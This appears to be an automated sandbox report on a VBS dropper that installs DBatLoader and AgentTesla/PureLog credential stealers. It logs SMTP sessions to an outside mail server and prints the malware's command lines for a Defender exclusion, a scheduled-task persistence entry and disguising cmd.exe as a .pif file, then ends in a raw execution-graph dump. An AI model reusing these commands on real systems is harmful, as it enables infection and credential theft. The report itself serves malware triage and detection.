    server-timing: cfL4;desc="?proto=TCP&rtt=2317&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1231547&cwnd=205&unsent_bytes=0&cid=999db7e7f2a730ec&ts=169&x=0"
2024-11-20 09:25:26 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
    Data Ascii: 8.46.123.75


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 20, 2024 10:25:01.032280922 CET | 587 | 49771 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 20 Nov 2024 09:25:00 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 20, 2024 10:25:01.032490015 CET | 49771 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 585948
Nov 20, 2024 10:25:01.212986946 CET | 587 | 49771 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 585948 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 20, 2024 10:25:01.217319012 CET | 49771 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
Nov 20, 2024 10:25:01.407747030 CET | 587 | 49771 | 51.195.88.199 | 192.168.2.5 | 220 TLS go ahead
Nov 20, 2024 10:25:30.494328022 CET | 587 | 49926 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 20 Nov 2024 09:25:30 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 20, 2024 10:25:30.494544029 CET | 49926 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 585948
Nov 20, 2024 10:25:30.681730032 CET | 587 | 49926 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 585948 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 20, 2024 10:25:30.681977987 CET | 49926 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
Nov 20, 2024 10:25:30.870675087 CET | 587 | 49926 | 51.195.88.199 | 192.168.2.5 | 220 TLS go ahead
Nov 20, 2024 10:25:33.829225063 CET | 587 | 49953 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 20 Nov 2024 09:25:33 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 20, 2024 10:25:33.843178034 CET | 49953 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 585948
Nov 20, 2024 10:25:34.026179075 CET | 587 | 49953 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 585948 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                250-PIPELINING
                                                                                                                                                                                                                                                                                                                                250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                250-STARTTLS
                                                                                                                                                                                                                                                                                                                                250 HELP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.030335903 CET49953587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.211302042 CET5874995351.195.88.199192.168.2.5220 TLS go ahead

Target ID: 0
Start time: 04:24:30
Start date: 20/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"
Imagebase: 0x7ff7ea370000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 04:24:31
Start date: 20/11/2024
Path: C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase: 0x400000
File size: 1'226'752 bytes
MD5 hash: 53F0663219E6091CECD600C59389711F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 3
Start time: 04:24:38
Start date: 20/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 04:24:38
Start date: 20/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 04:24:38
Start date: 20/11/2024
Path: C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit): true
Commandline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase: 0x8e0000
File size: 352'768 bytes
MD5 hash: 5F5105050FBE68E930486635C5557F84
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

                                                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                                                Start time:04:24:39
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                                                                                                                                                                                                                                                                                                                                Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                                                                File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                                                Start time:04:24:40
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                                                                                Start time:04:24:40
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                                                Start time:04:24:41
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2413558815.0000000005850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.000000000301A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                                                Start time:04:24:41
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x680000
                                                                                                                                                                                                                                                                                                                                File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation:low
Has exited:true

Target ID:11
Start time:04:24:43
Start date:20/11/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:0xdf0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:04:24:43
Start date:20/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:04:24:44
Start date:20/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
Imagebase:0x760000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:04:24:44
Start date:20/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:04:24:55
Start date:20/11/2024
Path:C:\Users\Public\Libraries\Juqmtmya.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
Imagebase:0x400000
File size:1'226'752 bytes
MD5 hash:53F0663219E6091CECD600C59389711F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Has exited:true

Target ID:17
Start time:04:24:57
Start date:20/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:04:24:57
Start date:20/11/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6ef0c0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:04:24:58
Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2555146769.0000000003140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000003.2364237623.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2553213718.0000000002F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                                                                                Start time:04:24:58
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                                                                                                                File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                                                                                Start time:04:25:05
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                                                Start time:04:25:08
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                                                                                Start time:04:25:10
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3563552557.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3561235753.0000000002AD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3564025665.0000000005770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3563972191.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2491911126.0000000000897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 25
Start time: 04:25:10
Start date: 20/11/2024
Path: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase: 0xa80000
File size: 70'656 bytes
MD5 hash: E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 04:25:41
Start date: 20/11/2024
Path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase: 0x1e0000
File size: 665'670'656 bytes
MD5 hash: 1EFEA57D13329E8280EA1889052BFB56
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
Has exited: false

Execution Graph

Execution Coverage: 16.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 8.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 21

[Execution graph: the interactive node/edge rendering (node ids, function addresses, "N API calls" summaries and a->b edges) does not survive extraction and is not reproduced here. What the graph does record, and what a triager would want from it, is the set of Windows APIs attached to its nodes:
memory and code: VirtualAlloc, VirtualFree, NtWriteVirtualMemory, FlushInstructionCache, LocalAlloc;
module and symbol resolution: LoadLibraryW, LoadLibraryExA, FreeLibrary, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetModuleFileNameA;
registry: RegOpenKeyExA, RegQueryValueExA, RegCloseKey;
timing: Sleep, QueryPerformanceCounter, GetTickCount, timeSetEvent;
network state: InetIsOffline;
message loop and UI: GetMessageA, TranslateMessage, DispatchMessageA, MessageBoxA;
process exit and console: ExitProcess, GetStdHandle, WriteFile;
strings, locale and TLS: SysAllocStringLen, SysReAllocStringLen, SysFreeString, lstrcpynA, lstrlenA, CharNextA, GetThreadLocale, GetLocaleInfoA, TlsSetValue, TlsGetValue.
Two chains in the graph are worth noting: the function at 2dc7d78 calls the resolver at 2dc8274 (GetModuleHandleW, GetProcAddress, GetProcAddress) and then NtWriteVirtualMemory before FreeLibrary; the function at 2dc8338 calls the same resolver and then FlushInstructionCache. Many remaining nodes are Sleep-only loops and string helpers.]
36563 2dd5420 36562->36563 36564 2db47ec 11 API calls 36563->36564 36565 2dd543f 36564->36565 36566 2dd5457 36565->36566 36567 2dc89d0 20 API calls 36566->36567 36568 2dd5463 36567->36568 36569 2db4860 11 API calls 36568->36569 36570 2dd5484 36569->36570 36571 2dd548f 36570->36571 36572 2db47ec 11 API calls 36571->36572 36573 2dd54bb 36572->36573 36574 2dd54c6 36573->36574 36575 2dc89d0 20 API calls 36574->36575 36576 2dd54df 36575->36576 36577 2dd54ef 36576->36577 36578 2dcdc04 5 API calls 36577->36578 36579 2dd54fa 36578->36579 36580 2dcdc04 5 API calls 36579->36580 36581 2dd5515 36580->36581 36582 2dd5530 36581->36582 36583 2dcdc04 5 API calls 36581->36583 36584 2db4860 11 API calls 36582->36584 36583->36582 36585 2dd5551 36584->36585 36586 2dd555c 36585->36586 36587 2db47ec 11 API calls 36586->36587 36588 2dd5588 36587->36588 36589 2dd5593 36588->36589 36590 2dc89d0 20 API calls 36589->36590 36591 2dd55ac 36590->36591 36592 2db4860 11 API calls 36591->36592 36593 2dd55cd 36592->36593 36594 2db47ec 11 API calls 36593->36594 36595 2dd5604 36594->36595 36596 2dc89d0 20 API calls 36595->36596 36597 2dd5628 36596->36597 36598 2db4860 11 API calls 36597->36598 36599 2dd5649 36598->36599 36600 2dd5654 36599->36600 36601 2dd5661 36600->36601 36602 2db47ec 11 API calls 36601->36602 36603 2dd5680 36602->36603 36604 2dd5698 36603->36604 36605 2dc89d0 20 API calls 36604->36605 36606 2dd56a4 36605->36606 36607 2db4860 11 API calls 36606->36607 36608 2dd56c5 36607->36608 36609 2dd56d0 36608->36609 36610 2dd56dd 36609->36610 36611 2db47ec 11 API calls 36610->36611 36612 2dd56fc 36611->36612 36613 2dd5714 36612->36613 36614 2dc89d0 20 API calls 36613->36614 36615 2dd5720 36614->36615 37880 2dce398 36615->37880 36618 2db4530 11 API calls 36619 2dd5746 36618->36619 36620 2db4860 11 API calls 36619->36620 36621 2dd5767 36620->36621 36622 2db47ec 11 API calls 36621->36622 36623 2dd579e 36622->36623 36624 2dc89d0 20 API calls 36623->36624 36625 2dd57c2 36624->36625 36626 2db4860 11 
